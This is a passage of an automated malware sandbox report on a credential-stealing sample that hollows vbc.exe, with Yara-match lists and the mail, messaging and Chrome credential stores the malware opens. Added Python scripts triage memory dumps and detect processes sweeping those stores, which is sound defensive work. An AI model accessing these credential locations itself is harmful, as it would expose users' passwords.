                Source: Yara match File source: 12.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4a7fa72.18.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.49edc72.14.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.pjavpo.exe.4965c92.9.unpack, type: UNPACKEDPE
                Source: Yara match File source: 12.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.306290437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 580, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
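The memory-dump names in the Yara-match lists above carry the evidence for the "process hollowing" and "injects a PE file into a foreign process" signatures: several stage-0 dumps of a private, executable-and-writable region at the default image base 0x400000 in the vbc.exe processes, i.e. memory written into the child before its own code ran. The following is an added triage helper written by the editor; it is not code from this report or from Joe Security. It assumes (inferred from the names on this page, not documented here) that an .sdmp name reads process index, stage, dump id, base address, protection, an undecoded field, memory type, an undecoded field, with protection and type holding the Windows MEMORY_BASIC_INFORMATION values, stage 0 being a dump taken at process start and stage 2 one taken at process end.

```python
"""Triage Joe Sandbox .sdmp names to decide which memory dumps to unpack first.

Added example by the editor, not code from this report or from Joe Security.
ASSUMPTION (inferred from the names in this report, not documented on the page):
    <process index>.<stage>.<dump id>.<base address>.<protect>.<?>.<type>.<?>.sdmp
where <protect> and <type> are Windows MEMORY_BASIC_INFORMATION values, stage 0 is
a dump taken at process start and stage 2 one taken at process end. Fields marked
<?> are not decoded.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Windows memory protection / type constants (winnt.h)
PAGE_PROTECT = {0x01: "NOACCESS", 0x02: "READONLY", 0x04: "READWRITE", 0x08: "WRITECOPY",
                0x10: "EXECUTE", 0x20: "EXECUTE_READ", 0x40: "EXECUTE_READWRITE",
                0x80: "EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$", re.I)


@dataclass(frozen=True)
class Dump:
    process: int
    stage: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:      # any PAGE_EXECUTE* bit
        return bool(self.protect & 0xF0)

    @property
    def writable(self) -> bool:        # READWRITE, WRITECOPY or their EXECUTE variants
        return bool(self.protect & 0xCC)

    @property
    def private(self) -> bool:
        return self.mem_type == 0x20000

    def describe(self) -> str:
        return (f"proc {self.process} stage {self.stage} @0x{self.base:X} "
                f"{PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))} "
                f"{MEM_TYPE.get(self.mem_type, hex(self.mem_type))}")


def parse(name: str) -> Dump:
    m = SDMP.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name: {name}")
    return Dump(int(m["proc"], 16), int(m["stage"], 16), int(m["dump_id"]),
                int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def hollowing_candidates(names, image_base=0x400000):
    """Stage-0 dumps of a private RWX region at the default PE image base: memory that
    was written into the child before its entry point ran, which is what the report's
    process-hollowing / PE-injection signatures describe."""
    return [d for d in map(parse, names)
            if d.stage == 0 and d.base == image_base
            and d.executable and d.writable and d.private]


def summarize(names):
    """Per-process count of dumps and of private RWX regions, plus the stages seen."""
    out = defaultdict(lambda: {"dumps": 0, "rwx_private": 0, "stages": set()})
    for d in map(parse, names):
        s = out[d.process]
        s["dumps"] += 1
        s["stages"].add(d.stage)
        if d.executable and d.writable and d.private:
            s["rwx_private"] += 1
    return dict(out)


REPORT_DUMPS = [  # names copied from this report's Yara-match lines
    "0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp",
    "0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000C.00000000.306290437.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp",
    "0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp",
    "00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp",
    "0000000D.00000000.307280478.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for d in hollowing_candidates(REPORT_DUMPS):
        print(d.describe())
```

Run against the names on this page, the candidate list is exactly the stage-0 dumps of processes 0xC and 0xD (the two vbc.exe children), each dumped three times at 0x400000 before the process ran; those, and not the read-write heap regions of process 5, are the dumps to unpack and hash first.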
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: Yara match | File source: 5.2.pjavpo.exe.4a29c0d.17.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41ce65.15.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.41ce65.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41ce65.12.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20f9265.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4997e0d.13.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.380b065.7.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.490fe2d.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000000.307280478.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5484, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
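The credential-theft signatures above rest on one behaviour: a single process, and a .NET compiler (vbc.exe) at that, opening the Outlook, Windows Mail, IncrediMail, Windows Live Mail, Google Talk and IdentityCRL registry stores and then Chrome's Login Data and Web Data databases in quick succession. That pattern is cheap to detect on an endpoint. The following detection is an added example written by the editor, not code from this report or from Joe Security; the event stream is constructed from the registry keys and file paths listed on this page, standing in for Sysmon registry-open and file-open events, and the allow-list of legitimate readers and the list of .NET hollowing hosts are the editor's assumptions.

```python
"""Flag processes that sweep credential stores the way the MailPassView /
WebBrowserPassView payloads running inside vbc.exe do in this report.

Added example by the editor, not code from this report or from Joe Security.
SAMPLE_EVENTS is a constructed stream of (pid, image, operation, target) tuples
standing in for Sysmon registry-key and file-open events; the targets are the
keys and files the report shows vbc.exe opening.
"""
import re
from collections import defaultdict

# Registry locations opened by vbc.exe in this report (mail and IM credential stores)
CREDENTIAL_KEYS = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail",
    r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts",
    r"HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt",
}
# Chrome credential databases opened by vbc.exe in this report, any profile directory
BROWSER_DB = re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Web Data)$", re.I)
# Images that legitimately read these stores (assumption: editor's allow-list)
EXPECTED_READERS = {"chrome.exe", "outlook.exe", "wlmail.exe", "incmail.exe", "googletalk.exe"}
# .NET framework binaries commonly abused as hollowing hosts; vbc.exe is the one seen here
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "msbuild.exe", "installutil.exe", "regasm.exe", "regsvcs.exe"}

VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
SAMPLE_EVENTS = [  # constructed: vbc.exe PID 580 replays the accesses listed in the report
    (580, VBC, "RegOpenKey", key) for key in sorted(CREDENTIAL_KEYS)
] + [
    (580, VBC, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (580, VBC, "FileOpen", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    # benign noise: Chrome reading its own database, Explorer touching a single key
    (4120, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "FileOpen",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (2200, r"C:\Windows\explorer.exe", "RegOpenKey",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail"),
]


def detect(events, min_stores=2):
    """Return one alert per process whose access pattern looks like credential harvesting."""
    hits = defaultdict(lambda: {"image": None, "stores": set(), "browser": set()})
    for pid, image, op, target in events:
        h = hits[pid]
        h["image"] = image
        if op == "RegOpenKey" and target in CREDENTIAL_KEYS:
            h["stores"].add(target)
        elif op == "FileOpen" and BROWSER_DB.search(target):
            h["browser"].add(target)

    alerts = []
    for pid, h in hits.items():
        name = h["image"].rsplit("\\", 1)[-1].lower()
        reasons = []
        if len(h["stores"]) >= min_stores:
            reasons.append(f"opened {len(h['stores'])} distinct mail/IM credential stores")
        if h["browser"] and name not in EXPECTED_READERS:
            reasons.append("non-browser process opened Chrome Login Data / Web Data")
        if name in DOTNET_HOSTS and (h["stores"] or h["browser"]):
            reasons.append(f"{name} is a .NET build tool with no business reading credentials; "
                           "likely a hollowed host")
        if reasons:
            alerts.append({"pid": pid, "image": h["image"], "stores": sorted(h["stores"]),
                           "browser_files": sorted(h["browser"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["pid"], a["image"])
        for r in a["reasons"]:
            print("  -", r)
```

The Chrome and Explorer events fall below the thresholds, so the only alert is PID 580; the third reason fires on the process image alone, which is the cheapest signal in the whole report: a compiler from the v2.0.50727 framework directory has no reason to touch any of these locations.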

                Remote Access Functionality

                Source: Yara match | File source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
